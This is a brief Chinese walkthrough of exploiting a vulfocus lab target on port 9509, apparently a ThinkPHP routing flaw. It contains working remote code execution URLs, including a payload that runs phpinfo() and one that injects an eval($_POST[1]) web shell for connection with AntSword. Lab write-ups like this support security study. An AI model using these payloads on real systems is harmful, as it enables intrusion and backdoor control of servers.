启动vulfocus的漏洞环境。
访问9509端口,即可访问到目标页面,默认界面如下:
直接访问如下的地址即可命令执行:
<http://192.168.10.214:9509/index.php?s=/index/index/name/$%7B@phpinfo()%7D>
网站根目录。
<http://192.168.10.214:53921//index.php?s=a/b/c/${@print(eval($_POST[1]))}>
使用蚁剑进行连接。